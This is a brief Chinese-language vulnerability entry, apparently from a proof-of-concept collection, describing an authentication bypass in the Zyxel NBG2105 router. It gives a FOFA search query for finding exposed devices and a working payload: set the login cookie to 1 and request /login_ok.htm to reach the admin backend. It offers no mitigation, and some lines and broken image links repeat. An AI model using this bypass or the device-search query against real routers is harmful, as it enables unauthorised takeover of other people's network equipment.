Z6-1Zyxel(合勤)-NBG2105-PermissionAC
漏洞描述:
在Zyxel NBG2105 V1.00(AAGU.2)C0设备上,将登录cookie设置为1可提供管理员访问权限。
网站图片:
-NBG2105-PermissionAC_0.png)
网络测绘:
fofa语法:
- fofaapp=“ZyXEL-NBG2105”
漏洞复现:
直接访问如下poc即可绕过身份验证进入后台
payload:
/login_ok.htm
效果图:-NBG2105-PermissionAC_1.png)
在Zyxel NBG2105 V1.00(AAGU.2)C0设备上,将登录cookie设置为1可提供管理员访问权限。
直接访问如下poc即可绕过身份验证进入后台
payload:
/login_ok.htm
效果图: